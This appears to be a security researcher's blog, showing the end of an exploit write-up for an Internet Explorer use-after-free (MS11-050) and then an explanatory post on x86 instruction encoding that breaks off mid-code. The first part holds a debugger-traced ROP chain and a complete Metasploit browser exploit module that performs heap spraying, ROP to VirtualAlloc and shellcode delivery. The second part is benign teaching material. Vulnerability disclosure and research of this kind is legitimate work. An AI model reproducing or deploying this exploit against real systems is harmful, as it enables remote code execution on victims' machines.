0c0c0c7c 773e3f18 ; comctl32!CImageList::_IsSameObject+0x40 ; stack pivot
0c0c0c80 3825a2d7 ; random
0c0c0c84 88f8a84d ; random
0c0c0c88 0566b421 ; random
Once the mshtml!CElement::Doc function is called, code execution should look like this:
mshtml!CElement::Doc:
3cf76b80 8b01            mov     eax,dword ptr [ecx]  ds:0023:35a00002=0c0c0c0c
3cf76b82 8b5070          mov     edx,dword ptr [eax+70h] ds:0023:0c0c0c7c=773e3f18
3cf76b85 ffd2            call    edx {comctl32!CImageList::_IsSameObject+0x40 (773e3f18)} ; stack pivot
The first ROP gadget is a stack-pivot that exchanges esp with eax (0c0c0c0c):
0:007> u comctl32!CImageList::_IsSameObject+40 L?2
comctl32!CImageList::_IsSameObject+0x40:
773e3f18 94              xchg    eax,esp  ; esp is now 0c0c0c0c
773e3f19 c3              ret              ; ret to kernel32!VirtualAlloc
After the stack-pivot is called, the stack (esp) should be at 0c0c0c0c. When the stack-pivot rets, it will ret into kernel32!VirtualAlloc, after which the ROP-stack should look like this:
mem @ esp (rop stack):
0c0c0c10 7c901db3 ; 2:ntdll!memcpy (second ret)
0c0c0c14 7f000000 ; 1:VirtualAlloc:lpAddress
0c0c0c18 00004000 ; 1:VirtualAlloc:dwSize
0c0c0c1c 00003000 ; 1:VirtualAlloc:flAllocationType MEM_COMMIT | MEM_RESERVE
0c0c0c20 00000040 ; 1:VirtualAlloc:flProtect rwx
0c0c0c24 7f001000 ; 3:nops+shellcode (third ret)
0c0c0c28 7f001000 ; 2:memcpy:dst
0c0c0c2c 23000100 ; 2:memcpy:src
0c0c0c30 00002fff ; 2:memcpy:size
kernel32!VirtualAlloc should then allocate 0x4000 read/write/execute bytes at address 0x7f000000 and return to ntdll!memcpy:
kernel32!VirtualAlloc:
7c809af1 8bff            mov     edi,edi
7c809af3 55              push    ebp
7c809af4 8bec            mov     ebp,esp
7c809af6 ff7514          push    dword ptr [ebp+14h]  ss:0023:0c0c0c20=00000040 ; flProtect (rwx)
7c809af9 ff7510          push    dword ptr [ebp+10h]  ss:0023:0c0c0c1c=00003000 ; flAllocationType (MEM_COMMIT | MEM_RESERVE)
7c809afc ff750c          push    dword ptr [ebp+0Ch]  ss:0023:0c0c0c18=00004000 ; dwSize
7c809aff ff7508          push    dword ptr [ebp+8]    ss:0023:0c0c0c14=7f000000 ; lpAddress
7c809b02 6aff            push    0FFFFFFFFh
7c809b04 e809000000      call    kernel32!VirtualAllocEx (7c809b12)
7c809b09 5d              pop     ebp
7c809b0a c21000          ret     10h                                            ; ret to ntdll!memcpy
After the ret to ntdll!memcpy, the ROP-stack should look like this:
mem @ esp:
0c0c0c24 7f001000 ; 3:nops+shellcode (third ret)
0c0c0c28 7f001000 ; 2:memcpy:dst
0c0c0c2c 23000100 ; 2:memcpy:src
0c0c0c30 00002fff ; 2:memcpy:size
ntdll!memcpy should then copy 0x2fff bytes from 0x23000100 (should be nops+shellcode) to 0x7f001000 (rwx memory allocated by call to VirtualAlloc) and return to the nops+shellcode at 0x7f001000:
ntdll!memcpy:
7c901db3 55              push    ebp
7c901db4 8bec            mov     ebp,esp
7c901db6 57              push    edi
7c901db7 56              push    esi
7c901db8 8b750c          mov     esi,dword ptr [ebp+0Ch] ss:0023:0c0c0c2c=23000100 ; src
7c901dbb 8b4d10          mov     ecx,dword ptr [ebp+10h] ss:0023:0c0c0c30=00002fff ; size
7c901dbe 8b7d08          mov     edi,dword ptr [ebp+8] ss:0023:0c0c0c28=7f001000   ; dst
...
7c901de6 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]               ; copy nops+shellcode to 0x7f001000
...
7c901f4d c9              leave
7c901f4e c3              ret                                                       ; ret to 7f001000 (nops+shellcode)
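To sanity-check the "mem @ esp" listings above, the python sketch below just replays the stack-pointer arithmetic of the three rets. It is a simplified model, not a debugger trace: the ret helper is made up, and the balanced push/pop pairs inside each function are ignored because they leave esp unchanged by the time the function returns.

```python
ROP_BASE = 0x0c0c0c0c


def ret(esp, extra=0):
    """Model `ret imm16`: pop the return address, then drop `extra` argument bytes."""
    return esp + 4 + extra


esp = ROP_BASE                  # after xchg eax,esp in the stack pivot
esp = ret(esp)                  # the pivot's ret lands in kernel32!VirtualAlloc
after_pivot = esp

esp = ret(esp, 0x10)            # VirtualAlloc's ret 10h (stdcall, 4 dword args)
after_virtualalloc = esp

esp = ret(esp)                  # memcpy's plain ret (cdecl, args stay on the stack)
after_memcpy = esp

print(hex(after_pivot), hex(after_virtualalloc), hex(after_memcpy))
```

The first two values match the listings above (0c0c0c10 and 0c0c0c24). The last one shows that the shellcode starts running with esp pointing at the leftover memcpy arguments.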
Below is the metasploit module I've made to exploit this vulnerability. I've tested it on a 32-bit WinXP SP3 fully patched up to (not including) this month's (June's) patches:
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    include Msf::Exploit::Remote::HttpServer::HTML
    include Msf::Exploit::Remote::BrowserAutopwn
    autopwn_info({
        :ua_name    => HttpClients::IE,
        :ua_minver  => "7.0",
        :ua_maxver  => "8.0",
        :javascript => true,
        :os_name    => OperatingSystems::WINDOWS,
        :vuln_test  => nil, 
    })

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'IE mshtml!CObjectElement Use After Free',
            'Description'    => %q{
                This module exploits a use-after-free vulnerability in Internet Explorer. The vulnerability
                occurs when an invalid <object> tag exists and other elements overlap/cover where the object
                tag should be when rendered (due to their styles/positioning). The mshtml!CObjectElement is
                then freed from memory because it is invalid. However, the mshtml!CDisplay object for the page 
                continues to keep a reference to the freed <object> and attempts to call a function on it,
                leading to the use-after-free.
            },
            'Author'         =>
                [
                    'd0c_s4vage',
                ],
            'Version'        => 'Version 1.0',
            'References'     =>
                [
                    ["MSB", "MS11-050"],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'thread',
                    'InitialAutoRunScript' => 'migrate -f',
                },
            'Payload'        =>
                {
                    'Space'         => 1024,
                    'BadChars'      => "\x00\x09\x0a\x0d'\\",
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Automatic', { } ],

                    # In IE6 the mshtml!CObjectElement size is 0xac

                    [ 'Internet Explorer 7', # 7.0.5730.13
                        {
                            # sizeof(mshtml!CObjectElement)
                            'FreedObjSize' =>  0xb0,
                            'FakeObjCount' => 0x4000,
                            'FakeObjCountKeep' => 0x2000,
                            'ForLoopNumObjects' => 3,
                            'FreedObjOverwritePointer'=>0x0c0c0c0c,
                            'FreedObjOffsetAlignSize'=>0,
                            'ROP' => false,
                        }
                    ],

                    [ 'Internet Explorer 8 (no DEP)', # 8.0.6001.18702
                        {
                            # sizeof(mshtml!CObjectElement)
                            'FreedObjSize' =>  0xe0, # 0xdc rounded up
                            'FakeObjCount' => 0x8000,
                            'FakeObjCountKeep' => 0x3000,
                            'ForLoopNumObjects' => 5,
                            'FreedObjOverwritePointer'=>0x0c0c0c0c,
                            'FreedObjOffsetAlignSize'=>0,
                            'ROP' => false,
                        }
                    ],

                    [ 'Internet Explorer 8',
                        {
                            'FreedObjSize' =>  0xe0, # 0xdc rounded up
                            'FakeObjCount' => 0x8000,
                            'FakeObjCountKeep' => 0x3000,
                            'ForLoopNumObjects' => 5,
                            'FreedObjOverwritePointer'=>0x0c0c0c0c,
                            'FreedObjOffsetAlignSize'=>2,
                            'StackPivot'=>0x773E3F18, # xchg eax,esp / ret - comctl32.dll
                            'ROP' => true,
                        }
                    ],

                    [ 'Debug Target (Crash)',
                        {
                        }
                    ],
                ],
            'DisclosureDate' => 'June 16 2011',
            'DefaultTarget'  => 0))
    end

    def auto_target(cli, request)
        agent = request.headers['User-Agent']
        if agent =~ /MSIE 8\.0/
            mytarget = targets[3] # IE 8
        elsif agent =~ /MSIE 7\.0/
            mytarget = targets[1]
        else
            print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
        end

        mytarget
    end

    
    # 3/22/2011
    # fully patched x32 WinXP SP3, IE 8.0.6001.18702
    def winxp_sp3_rva
        {
            "kernel32!VirtualAlloc"                => 0x7c809af1,
            "ntdll!memcpy"                        => 0x7c901db3,
        }
    end

    def compile_rop(rop_stack)
        rva = winxp_sp3_rva()
        num_random = 0
        rop_stack.map do |rop_val|
            case rop_val
            when String
                if rop_val == "random"
                    # useful for debugging
                    # num_random += 1
                    # 0xaabbcc00 + num_random
                    rand(0xffffffff)
                else
                    raise RuntimeError, "Unable to locate key: #{rop_val.inspect}" unless rva[rop_val]
                    rva[rop_val]
                end
            when Integer
                rop_val
            else
                raise RuntimeError, "unknown rop_val: #{rop_val.inspect}, #{rop_val.class}"
            end
        end.pack("V*")
    end

    def on_request_uri(cli, request)
        mytarget = target
        if target.name == 'Automatic'
            mytarget = auto_target(cli, request)
            unless mytarget
                send_not_found(cli)
                return
            end
        end
        @mytarget = mytarget
        @debug = true if mytarget == targets[4]

        return if ((p = regenerate_payload(cli)) == nil)

        if @debug
            data = <<-DATA
                <html>
                    <body>
                        <script language='javascript'>
                            document.body.innerHTML += "<object align='right' hspace='1000'   width='1000'>TAG_1</object>";
                            document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
                            document.body.innerHTML += "AAAAAAA";
                            document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
                        </script>
                    </body>
                </html>
            DATA
            print_status("Triggering #{self.name} vulnerability at #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
            send_response(cli, data, { 'Content-Type' => 'text/html' })
            return
        end

        raw_shellcode = payload.encoded
        shellcode = Rex::Text.to_unescape(raw_shellcode, Rex::Arch.endian(mytarget.arch))

        spray = nil
        rop_shellcode_spray = nil

        obj_overwrite_ptr = [@mytarget['FreedObjOverwritePointer']].pack("V")

        if @mytarget['ROP']
            rop_stack = []
            0x1f.times do |i|
                rop_stack << "random"
            end

            idx = -1
            idx += 1 ; rop_stack[idx] = "kernel32!VirtualAlloc"        # 1:
            idx += 1 ; rop_stack[idx] = "ntdll!memcpy"                # 2:ret 10 to this after VirtualAlloc
            idx += 1 ; rop_stack[idx] = 0x7f000000                    # 1:VirtualAlloc:lpAddress
            idx += 1 ; rop_stack[idx] = 0x4000                        # 1:VirtualAlloc:dwSize
            idx += 1 ; rop_stack[idx] = (0x1000 | 0x2000)            # 1:VirtualAlloc:flAllocationType MEM_COMMIT | MEM_RESERVE
            idx += 1 ; rop_stack[idx] = 0x40                        # 1:VirtualAlloc:flProtect rwx
            idx += 1 ; rop_stack[idx] = 0x7f001000                    # 3:into this after memcpy
            idx += 1 ; rop_stack[idx] = 0x7f001000                    # 2:memcpy:dst
            idx += 1 ; rop_stack[idx] = 0x23000100                    # 2:memcpy:src
            idx += 1 ; rop_stack[idx] = 0x2fff                        # 2:memcpy:size

            # align the rest of it
            back = rop_stack.slice!((rop_stack.length-1)-2, rop_stack.length)
            rop_stack = back + rop_stack

            rop_stack << @mytarget['StackPivot']

            # align the stack for 0c0c0c0c
            front = rop_stack.slice!(0, 19)
            rop_stack = rop_stack + front

            # resolve strings in the rop_stack array (kernel32!VirtualAlloc, random, etc)
            rop = compile_rop(rop_stack)

            nops = make_nops(0x1000 - raw_shellcode.length)
            nops = Rex::Text.to_unescape(nops, Rex::Arch.endian(mytarget.arch))

            rop_shellcode_spray = <<-JS
                // spray up to 0x23000000
                var shellcode = unescape("#{shellcode}");
                var nops = unescape("#{nops}");
                while(nops.length < 0x1000) nops += nops;
                var shell_heapblock = nops.substring(0, 0x800-shellcode.length) + shellcode;
                while(shell_heapblock.length < 0x40000) shell_heapblock += shell_heapblock;
                shell_finalspray = shell_heapblock.substring(0, (0x20000-6)/2);
                for(var shell_counter = 0; shell_counter < 0x1000; shell_counter++) { heap_obj.alloc(shell_finalspray); }
            JS

            spray = rop
            shellcode = ""
        else
            spray = obj_overwrite_ptr
        end

        spray = Rex::Text.to_unescape(spray, Rex::Arch.endian(mytarget.arch))

        js = <<-JS
            heap_obj = new heapLib.ie(0x20000);
            var heapspray = unescape("#{spray}");
            while(heapspray.length < 0x1000) heapspray += heapspray;
            var shellcode = unescape("#{shellcode}");
            var heapblock = heapspray.substring(0, (0x800-shellcode.length)) + shellcode;
            var offset = #{[targets[1], targets[2]].include?(@mytarget) ? "0x400" : "0"};
            var front = heapblock.substring(0, offset);
            var end = heapblock.substring(offset);
            heapblock = end + front;
            while(heapblock.length < 0x20000) heapblock += heapblock;
            finalspray = heapblock.substring(0, (0x10000-6)/2);
            for(var counter1 = 0; counter1 < 0x1000; counter1++) { heap_obj.alloc(finalspray); }

            #{rop_shellcode_spray}

            var obj_overwrite = unescape("#{Rex::Text.to_unescape(obj_overwrite_ptr, Rex::Arch.endian(mytarget.arch))}");
            while(obj_overwrite.length < #{@mytarget['FreedObjSize']}) { obj_overwrite += obj_overwrite; }
            obj_overwrite = obj_overwrite.slice(0, (#{@mytarget['FreedObjSize']}-6)/2);

            for(var num_objs_counter = 0; num_objs_counter < #{@mytarget['ForLoopNumObjects']}; num_objs_counter++) {
                document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
            }

            for(var counter4 = 0; counter4 < #{@mytarget['FakeObjCountKeep']}; counter4++) { heap_obj.alloc(obj_overwrite, "keepme1"); }
            for(var counter5 = 0; counter5 < #{@mytarget['FakeObjCountKeep']}; counter5++) { heap_obj.alloc(obj_overwrite, "keepme2"); }

            document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
            document.body.innerHTML += "AAAA";
            document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
        JS
        opts = {
            'Symbols' => {
                'Variables' => %w{ heap_obj heapspray shellcode heapblock offset front end finalspray counter1
                                   obj_overwrite counter2 counter3 num_objs_counter counter4 counter5
                                   nops shell_heapblock shell_finalspray shell_counter
                                   fill_free_objs freeme keepme1 keepme2 },
                'Methods' => %w{  }
            }
        }
        js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
        # js.obfuscate()
        js = heaplib(js)

        html = <<-HTML
            <html>
                <body>
                    <script language='javascript'>
                    #{js}
                    </script>
                </body>
            </html>
        HTML

        print_status("Sending exploit for #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")

        send_response(cli, html, {'Content-Type'=>'text/html'})
    end
end
Laters

Monday, April 4, 2011

Interesting Behaviors in x86 Instructions

**
This is an expanded and improved version of a talk I gave at the last AHA! meeting here in Austin. My slides for that talk can be found here
**


Recently I've been working on my windbg extension, narly. Part of my intended purpose for it is to be able to search for ROP gadgets, but to do that I needed to find a disassembler that I could use. I couldn't use the disassembler available through the windbg extension API, since the only thing you can do is call IDebugControl::Disassemble, which just returns a string of the disassembly. I could have used a number of other open-source disassemblers, but decided to reinvent the wheel and write my own. A lot of people would groan at the thought of reinventing the wheel, but I usually enjoy it since it's one of the best ways I learn.

I've been coding my disassembler straight from the Intel® 64 and IA-32 Architectures Software Developer's Manual: Volume 2A: Instruction Set Reference, A-M and Volume 2B: Instruction Set Reference, N-Z. Reading through specs that define how things are supposed to behave is always interesting, because you start to understand some of the boundaries/corner cases and see ways that some potentially interesting behaviors might occur. This blog post is about some interesting techniques I've come across to represent the same instruction in multiple ways (using a different set of bytes to do the exact same thing). Note that I've only been able to test this out on Intel processors.

To understand most of what I'll be talking about, you'll have to somewhat understand the parts of an x86 instruction, as well as the "rules" that go with them. Once I go over the "rules", I'll then explain the ways I've come up with to represent the same instruction using different sets of bytes, both by following the rules and by breaking them.

instructions and rules


An x86 instruction is made up of several parts:

+----------+--------+--------+-----+--------------+-----------+
| prefixes | opcode | modR/M | sib | displacement | immediate |
+----------+--------+--------+-----+--------------+-----------+
Everybody knows the opcode part of an instruction, but I'm betting fewer know how the other parts of an instruction work and interact.

prefixes

+----------+--------+--------+-----+--------------+-----------+
| prefixes | opcode | modR/M | sib | displacement | immediate |
+----------+--------+--------+-----+--------------+-----------+
Prefixes are bytes that precede the opcode and modify the meaning or action of the instruction. A single instruction can have up to four separate prefixes (one byte each). Prefixes can be arranged in any order. Below is the list of available prefixes:

prefix | name
-------+-----------------------
  0xf0 | LOCK
  0xf2 | REPNE/REPNZ
  0xf3 | REPE/REPZ
       |
  0x2e | CS Segment override
  0x36 | SS Segment override
  0x3e | DS Segment override
  0x26 | ES Segment override
  0x64 | FS Segment override
  0x65 | GS Segment override
       |
  0x2e | *Branch not taken
  0x3e | *Branch taken
       |
  0x66 | Operand-size override
  0x67 | Address-size override
 
*for use only with Jcc instructions
The Intel manual says "it is only useful to include up to one prefix code from each of the four groups". This means that an instruction like the one below shouldn't "be useful", since the lock and the rep prefixes are both from the same group:
lock rep add dword ptr[eax],eax
Windbg seems to think that it's not only "not useful", but invalid as well (f0 = lock, f3 = rep):
01011a3f f0              ???
01011a40 f30100          rep add dword ptr [eax],eax
Also, some of the prefixes are supposed to only be used with certain instructions. If they are used with other instructions, the behavior is undefined. For example, the branch prefixes (3e and 2e) are only supposed to be applied to the Jcc instructions (conditional jmps). Applying them to other instructions could, in theory, yield unexpected behavior.

Below are some examples of the effects prefixes have on instructions:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | 59     |       |     |          |          | pop ecx
           66 | 59     |       |     |          |          | pop cx
         f366 | 59     |       |     |          |          | rep pop cx
         f266 | 59     |       |     |          |          | repne pop cx
       f22e66 | 59     |       |     |          |          | repne pop cx
              |        |       |     |          |          |
              | 8b     | 03    |     |          |          | mov eax,dword ptr [ebx]
           67 | 8b     | 03    |     |          |          | mov eax,dword ptr [bp+di]
         6667 | 8b     | 03    |     |          |          | mov ax,word ptr [bp+di]
         663e | 8b     | 03    |     |          |          | mov ax,word ptr ds:[ebx]
              |        |       |     |          |          |
              | 01     | 00    |     |          |          | add dword ptr[eax],eax
           f0 | 01     | 00    |     |          |          | lock add dword ptr[eax],eax
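
As a rough illustration of the prefix table, here is a minimal Python sketch that peels the leading prefix bytes off a single instruction. It assumes 32-bit mode (so none of these byte values can start an opcode), and the names `PREFIX_NAMES` and `split_prefixes` are made up for this example; they are not part of narly or any real disassembler.

```python
# Prefix byte values taken from the table above (32-bit mode assumed).
PREFIX_NAMES = {
    0xF0: "lock",
    0xF2: "repne",
    0xF3: "rep",
    0x2E: "cs / branch not taken",
    0x36: "ss",
    0x3E: "ds / branch taken",
    0x26: "es",
    0x64: "fs",
    0x65: "gs",
    0x66: "operand-size override",
    0x67: "address-size override",
}


def split_prefixes(code: bytes):
    """Return (prefix_bytes, rest) for the start of one instruction."""
    i = 0
    # Keep consuming bytes for as long as they are known prefix values.
    while i < len(code) and code[i] in PREFIX_NAMES:
        i += 1
    return code[:i], code[i:]


if __name__ == "__main__":
    # f2 2e 66 59 is the "repne pop cx" row from the table.
    prefixes, rest = split_prefixes(bytes.fromhex("f22e6659"))
    print([PREFIX_NAMES[b] for b in prefixes], rest.hex())
```

Note that the sketch does not enforce any limit on the number of prefixes or on which groups they come from; it only separates them from the opcode.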

opcode

+----------+--------+--------+-----+--------------+-----------+
| prefixes | opcode | modR/M | sib | displacement | immediate |
+----------+--------+--------+-----+--------------+-----------+
An opcode is the core of an instruction. Everything else is supplementary to it. The opcode itself can be one, two, or three bytes long, and some opcodes also require a mandatory prefix byte, for up to four bytes in total.

Each opcode determines how its operands are encoded. For example, an opcode might use the modR/M byte, modR/M and sib bytes, or modR/M byte and displacement,
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | 8b     | 03    |     |          |          | mov eax,dword ptr[ebx]
              | 8b     | 04    | bb  |          |          | mov eax,dword ptr[ebx+edi*4]
              | 8b     | 83    |     | 10203040 |          | mov eax,dword ptr[ebx+40302010]
an immediate value,
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | b8     |       |     |          | aabbccdd | mov eax,ddccbbaa
or add a register index to the opcode:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm         
--------------+--------+-------+-----+----------+----------+--------
              | 58     |       |     |          |          | pop eax   eax = 00
              | 59     |       |     |          |          | pop ecx   ecx = 01
              | 5a     |       |     |          |          | pop edx   edx = 02
              | 5b     |       |     |          |          | pop ebx   ebx = 03
              | 5c     |       |     |          |          | pop esp   esp = 04
              | 5d     |       |     |          |          | pop ebp   ebp = 05
              | 5e     |       |     |          |          | pop esi   esi = 06
              | 5f     |       |     |          |          | pop edi   edi = 07
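
The register-index trick in the pop table can be sketched in a few lines of Python. The helper names `pop_opcode` and `decode_pop` are hypothetical, and the sketch only covers the one-byte `pop r32` range (0x58 through 0x5f) shown above.

```python
# Register numbering from the table above (index = low three bits of the opcode).
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def pop_opcode(reg: str) -> int:
    """Encode 'pop <reg>' by adding the register index to the base opcode 0x58."""
    return 0x58 + REG32.index(reg)


def decode_pop(opcode: int) -> str:
    """Decode a one-byte pop opcode back into its disassembly."""
    if not 0x58 <= opcode <= 0x5F:
        raise ValueError("not a one-byte pop r32 opcode: %#x" % opcode)
    return "pop " + REG32[opcode & 0x7]


if __name__ == "__main__":
    for reg in REG32:
        op = pop_opcode(reg)
        print("%02x  %s" % (op, decode_pop(op)))
```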

modR/M

+----------+--------+--------+-----+--------------+-----------+
| prefixes | opcode | modR/M | sib | displacement | immediate |
+----------+--------+--------+-----+--------------+-----------+
The modR/M byte is made up of three parts:
  7   6   5   4   3   2   1   0   
+---+---+---+---+---+---+---+---+
|  mod  |reg/opcode |    r/m    |
+-------+-----------+-----------+
The modR/M byte uses either a 16-bit or 32-bit addressing mode. The 0x67 prefix (address-size override) switches the addressing mode from 32 to 16 bit.

Depending on the values of the mod and r/m parts of the modR/M byte, the sib byte (32-bit addressing mode only) or a displacement (8, 16, or 32 bits) may also be required. Also, if there is no second operand, the reg/opcode part may be used as an opcode extension.

There are two tables that define the meaning of the modR/M byte, one for each addressing mode:


Below are examples of different ways the modR/M byte might be used:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | 8b     | 03    |     |          |          | mov eax,dword ptr [ebx]
              | 8b     | 05    |     |aabbccdd  |          | mov eax,dword ptr ds:[ddccbbaa]
              | 8b     | 41    |     |   10     |          | mov eax,dword ptr[ecx+10]
              |        |       |     |          |          |
           67 | 8b     | 03    |     |          |          | mov eax, dword ptr[bp+di]
           67 | 8b     | 05    |     |          |          | mov eax, dword ptr[di]
           67 | 8b     | 0c    |     |          |          | mov ecx, dword ptr[si]
           67 | 8b     | 41    |     |   10     |          | mov eax, dword ptr[bx+di+10]
           67 | 8b     | 81    |     |  1010    |          | mov eax, dword ptr[bx+di+1010]
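
To make the three fields concrete, here is a small Python sketch that splits a modR/M byte and reports what follows it in 32-bit addressing mode. The function names are invented for this example, and `extra_bytes_32` deliberately ignores one special case (a sib byte whose base is 101 with mod 00, which adds a 32-bit displacement).

```python
def split_modrm(modrm: int):
    """Split a modR/M byte into its (mod, reg/opcode, r/m) fields."""
    mod = (modrm >> 6) & 0x3   # top two bits
    reg = (modrm >> 3) & 0x7   # middle three bits
    rm = modrm & 0x7           # low three bits
    return mod, reg, rm


def extra_bytes_32(modrm: int):
    """Return (has_sib, displacement_size_in_bytes) for 32-bit addressing."""
    mod, _reg, rm = split_modrm(modrm)
    has_sib = mod != 3 and rm == 4       # r/m of 100 selects a sib byte
    if mod == 0:
        disp_size = 4 if rm == 5 else 0  # mod 00, r/m 101 is a bare disp32
    elif mod == 1:
        disp_size = 1                    # disp8
    elif mod == 2:
        disp_size = 4                    # disp32
    else:
        disp_size = 0                    # mod 11: register operand, no memory
    return has_sib, disp_size


if __name__ == "__main__":
    for byte in (0x03, 0x05, 0x41, 0x1C, 0xC2):
        print(hex(byte), split_modrm(byte), extra_bytes_32(byte))
```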

sib

+----------+--------+--------+-----+--------------+-----------+
| prefixes | opcode | modR/M | sib | displacement | immediate |
+----------+--------+--------+-----+--------------+-----------+
The sib byte is only required when the "Effective Address" column in the 32-bit modR/M table has a value that looks like
[--][--]
The sib byte has three parts:
  7   6   5   4   3   2   1   0   
+---+---+---+---+---+---+---+---+
| scale |   index   |   base    |
+-------+-----------+-----------+
This byte is used to make instructions behave like this:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | 8b     | 1c    | 83  |          |          | mov ebx,dword ptr[ebx+eax*4]
                                                                                |   |   \----> scale
                                                                                |   |
                                                                                |   \----> index
                                                                                |
                                                                                \----> base
The sib byte's meaning is defined by the table below:


Some examples on using the sib byte are below:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | 8b     | 1c    | 03  |          |          | mov ebx,dword ptr[ebx+eax]
              | 8b     | 1c    | 43  |          |          | mov ebx,dword ptr[ebx+eax*2]
              | 8b     | 1c    | 83  |          |          | mov ebx,dword ptr[ebx+eax*4]
              | 8b     | 1c    | c3  |          |          | mov ebx,dword ptr[ebx+eax*8]
              |        |       |     |          |          |
              | 8b     | 1c    | 23  |          |          | mov ebx,dword ptr[ebx]
              | 8b     | 1c    | 63  |          |          | mov ebx,dword ptr[ebx]
              | 8b     | 1c    | a3  |          |          | mov ebx,dword ptr[ebx]
              | 8b     | 1c    | e3  |          |          | mov ebx,dword ptr[ebx]
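
The sib examples above can be reproduced with a short Python sketch. It assumes the mod part of the modR/M byte is 00 and does not handle the base=101 case (which means "disp32, no base" when mod is 00); `decode_sib` is a name made up for this illustration.

```python
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def decode_sib(sib: int) -> str:
    """Render the effective address selected by a sib byte (mod == 00 assumed)."""
    scale = 1 << ((sib >> 6) & 0x3)   # 1, 2, 4 or 8
    index = (sib >> 3) & 0x7
    base = sib & 0x7
    if base == 5:
        raise NotImplementedError("base=101 with mod=00 means disp32, not ebp")
    parts = [REG32[base]]
    if index != 4:                    # index 100 means "no scaled index"
        term = REG32[index]
        if scale > 1:
            term += "*%d" % scale
        parts.append(term)
    return "[" + "+".join(parts) + "]"


if __name__ == "__main__":
    for sib in (0x03, 0x43, 0x83, 0xC3, 0x23, 0x63, 0xA3, 0xE3):
        print("%02x  mov ebx,dword ptr%s" % (sib, decode_sib(sib)))
```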

immediate

+----------+--------+--------+-----+--------------+-----------+
| prefixes | opcode | modR/M | sib | displacement | immediate |
+----------+--------+--------+-----+--------------+-----------+
The immediate value of an instruction is very simple, so a few examples should suffice:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | 04     |       |     |          |       aa | add al,aa
           66 | 05     |       |     |          |     aaaa | add ax,aaaa
              | 05     |       |     |          | aaaaaaaa | add eax,aaaaaaaa
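
The one thing worth remembering about immediates (and displacements) is that they are stored little-endian, which is why the bytes `aabbccdd` earlier in this post disassemble as `ddccbbaa`. A tiny Python sketch, with `le_value` being a helper name invented for this example:

```python
def le_value(raw_hex: str) -> int:
    """Interpret a run of instruction bytes as a little-endian integer."""
    return int.from_bytes(bytes.fromhex(raw_hex), "little")


if __name__ == "__main__":
    # Byte strings taken from the imm and disp columns of the tables in this post.
    for raw in ("aabbccdd", "10203040", "1020", "10"):
        print(raw, "->", "%x" % le_value(raw))
```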

multiple representations


Now it's time for the good stuff :^)

playing fair with modR/M


If you take another look at the 16 and 32-bit modR/M tables, you'll notice that when the mod part is 0x3 (binary 11), the operand is not dereferenced. This can be used to create another representation of an instruction:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | 5a     |       |     |          |          | pop edx
              | 8f     | c2    |     |          |          | pop edx
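
Here is a minimal Python sketch of how both encodings of `pop <reg>` can be generated: the one-byte form that folds the register index into the opcode, and the `8f` form with a modR/M byte whose mod part is 11. `pop_encodings` is a hypothetical helper, not something from an existing assembler.

```python
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def pop_encodings(reg: str):
    """Return (short_form, long_form) byte strings for 'pop <reg>'."""
    index = REG32.index(reg)
    short_form = bytes([0x58 + index])
    # modR/M = mod 11, reg/opcode 000 (the opcode extension for pop), r/m = register
    long_form = bytes([0x8F, 0xC0 | index])
    return short_form, long_form


if __name__ == "__main__":
    for reg in REG32:
        short_form, long_form = pop_encodings(reg)
        print("pop %s: %s or %s" % (reg, short_form.hex(), long_form.hex()))
```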

playing fair with sib


In the sib table, you'll notice that whenever the index part is 0x4 (100 binary), a scaled index isn't used. This can also let us make multiple representations of an instruction:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | 8b     | 00    |     |          |          | mov eax,dword ptr[eax]
              | 8b     | 04    | 20  |          |          | mov eax,dword ptr[eax]
              | 8b     | 04    | 60  |          |          | mov eax,dword ptr[eax]
              | 8b     | 04    | a0  |          |          | mov eax,dword ptr[eax]
              | 8b     | 04    | e0  |          |          | mov eax,dword ptr[eax]
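
The five rows above can be generated mechanically, since the scale bits are ignored whenever the index is 100. A short Python sketch (the function name is made up for this example):

```python
def mov_eax_deref_eax_encodings():
    """List the equivalent encodings of 'mov eax,dword ptr[eax]' shown above."""
    encodings = [bytes([0x8B, 0x00])]          # plain modR/M form, no sib byte
    for scale_bits in range(4):
        # index = 100 (no scaled index), base = 000 (eax); scale is a don't-care
        sib = (scale_bits << 6) | (0b100 << 3) | 0b000
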